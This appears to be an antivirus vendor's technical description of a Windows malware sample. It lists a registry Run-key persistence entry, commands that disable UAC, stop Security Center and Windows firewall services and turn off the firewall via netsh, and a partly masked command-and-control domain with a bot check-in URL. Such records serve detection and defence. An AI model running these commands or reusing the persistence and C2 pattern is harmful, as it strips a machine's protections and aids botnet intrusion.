Technical information
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Microsofts Update' = '%WINDIR%\csrssr.exe'
- User Account Control (UAC)
- '<SYSTEM32>\net1.exe' stop "Security Center"
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' stop SharedAccess
- '<SYSTEM32>\net1.exe' stop "Centro de Seguridad"
- '<SYSTEM32>\net.exe' stop "Security Center"
- '<SYSTEM32>\netsh.exe' firewall set opmode mode = DISABLE
- '<SYSTEM32>\net.exe' stop SharedAccess
- '<SYSTEM32>\net.exe' stop "Centro de Seguridad"
- %WINDIR%\csrssr.exe
- 'hy###whms.co.cc':80
- hy###whms.co.cc/priv8/bots.php?na###################
- DNS ASK hy###whms.co.cc